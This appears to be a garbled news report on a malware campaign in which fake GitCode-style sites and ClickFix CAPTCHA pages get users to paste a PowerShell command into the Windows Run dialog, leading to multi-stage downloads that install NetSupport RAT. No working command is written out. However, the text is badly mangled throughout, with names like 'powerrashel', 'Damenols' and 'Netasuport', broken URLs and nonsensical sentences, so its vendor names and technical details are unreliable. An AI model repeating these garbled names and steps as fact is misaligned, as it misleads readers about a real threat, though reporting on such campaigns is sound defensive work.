Danger Hunters are alert to a new campaign that is working to trick users to perform misleading websites on their machines to execute malicious powerrashel scripts and infect with netsupport rats.
The Damenols Investigation (DTI) team stated that it identified the “malicious multi-stage downloader powerrashel scripts”, which was hosted as Mascarade as Gitcode and Discussing.
The company said in a technical report shared with hacker news, “These site attempts to cheat users to copy and run an initial powerrashel script on their Windows Run Command.”
“When doing so, the Powershell script downloads another downloader script and executes on the system, which in turn retains the additional payload and executes them to install a netsupport rat on infected machines.”
It is believed that these fake sites can be promoted through email and social engineering efforts on social media platforms.
The powerrashel script hosted on fake guitcode sites is designed to download a series of intermediate powerrashel scripts from an outer server (“Tradingwitool)[.]com “) Which is used in succession to launch Netasuport rat on afflicted machines.
Damenols said that it has identified many websites.[.]com) To distribute the same remote access trojan but with a twist: clickfix-style captcha verification to run malicious powerrashel scripts to the victims.
Like the chain of the recently documented attack, users landing on the pages, distributing the edestaler infoselor, are asked to prove that they are not robots by completing checks.
By triggering captcha verification, an objected powerful command for the user’s clipboard is copied clandestin – a technique called clipboard poisoning – after which they are instructed to launch Windows Run Dialog (“Vin + R”), paste (“CTRL + V”), and press the entry, and press the entry, and press the entry, which is pressurized to press the ad. Can be executed.
The Powershell script works by downloading a firm script (“WBDIMS.EXE”) from the Github to ensure that the payload is automatically launched when logged into the user system.
“While this payload was no longer available during the investigation, it is expected that it examines with the delivery site through the document[.]com/verification/C.Php, “Damenols said. “When doing so, it triggers a refresh in the browser for the page.[.]com/verification/s.php? A = 1. ,
This is the result in the distribution of another-step powerrashel script, which then “A” from the URL parameter “A” 2. “2.” By setting, the third-step zip from the same server downloads and executes. The script proceeds to unpack the archive and run an executable to run an executable “jp2launcher.exe”, eventually leading to the deployment of netsuport rats.
The company said, “Downloading several stages of scripts and running scripts that still download and run more scripts are probably more flexible to find out and safety checks and takedowns.”
It is not currently clear who is behind the campaign, but Donoceols reported that it identified the same delivery URL, domain nomenclature and registration pattern regarding the Society (aka fake -updates) campaign in October 2024.
“In particular, the techniques involved are common and the Net’s upport manager is a legitimate administration tool known as a rat by many danger groups such as Fin 7, Scarlett Goldfinch, Storm -0408, and others such as a rat.”
